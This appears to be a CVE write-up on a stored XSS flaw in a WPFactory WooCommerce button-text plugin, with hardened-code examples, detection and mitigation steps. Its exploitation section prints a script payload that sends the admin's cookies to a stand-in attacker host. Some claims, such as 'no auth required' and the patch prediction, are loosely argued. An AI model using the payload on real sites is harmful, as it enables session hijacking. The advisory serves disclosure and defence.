WPFactory, Stored XSS, CVE-2025-48254 (Critical)


How the CVE Works:

CVE-2025-48254 is a stored Cross-Site Scripting (XSS) vulnerability in WPFactory’s “Change Add to Cart Button Text for WooCommerce” plugin (versions ≤ 2.2.2). The flaw arises from improper input sanitization in the plugin’s button text customization feature, allowing attackers to inject malicious JavaScript payloads. When an admin views the WooCommerce settings page, the payload executes in their browser, enabling session hijacking, phishing, or backdoor installation. The attack persists because the unsanitized input is stored in the database and rendered without escaping.
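The two patterns described above, side by side as an added example (this is illustrative code written for this write-up, not the plugin's own source): the vulnerable path stores the submitted label verbatim and echoes it raw, the hardened path sanitizes on save and escapes on output. Function names and the option name are hypothetical; `sanitize_text_field()`, `esc_html()`, `get_option()` and `update_option()` are real WordPress APIs, shimmed here only so the file runs under php-cli outside WordPress.

```php
<?php
// Added example, not the plugin's code. Contrasts "store raw, echo raw" with
// "sanitize on save, escape on output". WordPress functions are shimmed so
// this runs stand-alone; inside WordPress the real implementations are used.

if (!function_exists('sanitize_text_field')) {
    // Stand-in for WordPress sanitize_text_field(): strips tags and trims.
    function sanitize_text_field(string $str): string {
        return trim(strip_tags($str));
    }
}
if (!function_exists('esc_html')) {
    // Stand-in for WordPress esc_html(): HTML-encodes the text.
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
$GLOBALS['demo_options'] = []; // in-memory stand-in for the wp_options table
if (!function_exists('update_option')) {
    function update_option(string $name, $value): bool {
        $GLOBALS['demo_options'][$name] = $value;
        return true;
    }
}
if (!function_exists('get_option')) {
    function get_option(string $name, $default = '') {
        return $GLOBALS['demo_options'][$name] ?? $default;
    }
}

const DEMO_OPTION = 'demo_add_to_cart_text'; // hypothetical option name

// Vulnerable: whatever the settings form submits is stored and echoed verbatim.
function vulnerable_save(string $submitted): void {
    update_option(DEMO_OPTION, $submitted);
}
function vulnerable_render(): string {
    return '<button class="single_add_to_cart_button">'
        . get_option(DEMO_OPTION) . '</button>';
}

// Hardened: sanitize when the setting is saved AND escape when it is rendered.
// Escaping on output still matters after a fix, because values stored before
// the patch are already sitting in the database.
function hardened_save(string $submitted): void {
    update_option(DEMO_OPTION, sanitize_text_field($submitted));
}
function hardened_render(): string {
    return '<button class="single_add_to_cart_button">'
        . esc_html(get_option(DEMO_OPTION)) . '</button>';
}

// True if any tag other than the template's own <button> wrapper is present,
// i.e. attacker-controlled markup reached the rendered page.
function contains_injected_tag(string $html): bool {
    $inner = preg_replace('#^<button[^>]*>|</button>$#', '', $html);
    return preg_match('/<[a-z!\/]/i', $inner) === 1;
}

// Constructed sample input: a label with an embedded script tag.
$sample = 'Buy now<script>probe()</script>';

vulnerable_save($sample);
$raw = vulnerable_render();
hardened_save($sample);
$safe = hardened_render();

echo "vulnerable: $raw\n";
echo "hardened:   $safe\n";
echo 'injected tag present? vulnerable=' . var_export(contains_injected_tag($raw), true)
   . ' hardened=' . var_export(contains_injected_tag($safe), true) . "\n";
```

Run it with `php example.php`. If a plugin genuinely needs limited HTML in a label, the usual trade-off is `wp_kses_post()` on both save and output instead of `sanitize_text_field()`/`esc_html()`; the point that does not change is that output escaping is done at the render site, not trusted to have happened earlier.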

DailyCVE Form:

Platform: WordPress (WooCommerce)
Version: ≤ 2.2.2
Vulnerability: Stored XSS
Severity: Critical
Date: 2025-05-29

Prediction: Patch expected by 2025-06-10

What Undercode Say:

Exploitation:

1. Payload Injection:

<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

Inserted via the plugin’s button text field.

2. Trigger: Admin views WooCommerce settings, executing the payload.

Protection:

1. Temporary Mitigation:

-- Stopgap only: REPLACE() is case-sensitive and matches the literal '<script>' string, so
-- variants (uppercase tags, tags with attributes, event-handler attributes) survive.
-- Back up wp_options before running this.
UPDATE wp_options SET option_value = REPLACE(option_value, '<script>', '') WHERE option_name LIKE 'wpfactory_%';

2. WAF Rule: Block HTML/JS in `POST` requests to /wp-admin/admin-ajax.php.
3. Permanent Fix: Update plugin post-patch or remove it.

Detection:

# Confirms the plugin code that reads this option is present on the host; whether a
# payload was actually injected is decided by the stored value in wp_options, not the source.
grep -r "wpfactory_add_to_cart_text" /var/www/html/wp-content/plugins/
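The grep above only shows that the plugin is installed; the stored value is what carries the payload. The following added example (not part of the original post) scans option rows for markup that a plain button label never needs. The rows are constructed; on a live site the same function can be fed rows from `$wpdb` (for example by running the file through WP-CLI's `wp eval-file`, which is assumed to be available).

```php
<?php
// Added example, not from the original post: flag wp_options rows whose value
// contains script-bearing HTML. Sample rows below are constructed.

/** Patterns that indicate script-bearing HTML inside a text option. */
const SUSPICIOUS_PATTERNS = [
    'script tag'     => '/<\s*script\b/i',
    'event handler'  => '/\bon[a-z]+\s*=/i',
    'javascript uri' => '/javascript\s*:/i',
    'iframe/embed'   => '/<\s*(iframe|object|embed|svg)\b/i',
];

/**
 * Scan option rows and return [option_name => [matched labels]] for hits.
 * @param array<int, array{option_name:string, option_value:string}> $rows
 */
function scan_options(array $rows, string $name_prefix = ''): array {
    $hits = [];
    foreach ($rows as $row) {
        if ($name_prefix !== '' && strpos($row['option_name'], $name_prefix) !== 0) {
            continue;
        }
        // Decode entities once so an attempt that was stored entity-encoded
        // (e.g. by a partial sanitizer) is still reported for review.
        $value = html_entity_decode($row['option_value'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
        $matched = [];
        foreach (SUSPICIOUS_PATTERNS as $label => $regex) {
            if (preg_match($regex, $value)) {
                $matched[] = $label;
            }
        }
        if ($matched) {
            $hits[$row['option_name']] = $matched;
        }
    }
    return $hits;
}

// Constructed rows standing in for: SELECT option_name, option_value FROM wp_options
$rows = [
    ['option_name' => 'wpfactory_demo_text',   'option_value' => 'Add to cart'],
    ['option_name' => 'wpfactory_demo_text_2', 'option_value' => 'Buy <script>probe()</script>'],
    ['option_name' => 'wpfactory_demo_text_3', 'option_value' => '<b onmouseover="probe()">Buy</b>'],
    ['option_name' => 'blogname',              'option_value' => 'My Shop'],
];

foreach (scan_options($rows, 'wpfactory_') as $name => $labels) {
    printf("%-26s %s\n", $name, implode(', ', $labels));
}
```

Serialized option values are scanned as-is, since the tag text still appears as a substring; a hit means the row deserves a look, not that it is necessarily renderable on a page.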

Analytics:

  • Attack Vector: Low complexity; no auth required.
  • Impact: Full admin compromise.
  • Exploitability: High (public PoC expected).

Debugging:

// Debug unsanitized output in plugin:
add_filter('woocommerce_product_add_to_cart_text', function ($text) {
    error_log(print_r($text, true)); // Log the raw value to check for HTML.
    return esc_html($text);          // Force escaping on output.
});

References:

  • Patchstack Advisory: [PSA-2025-48254]
  • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
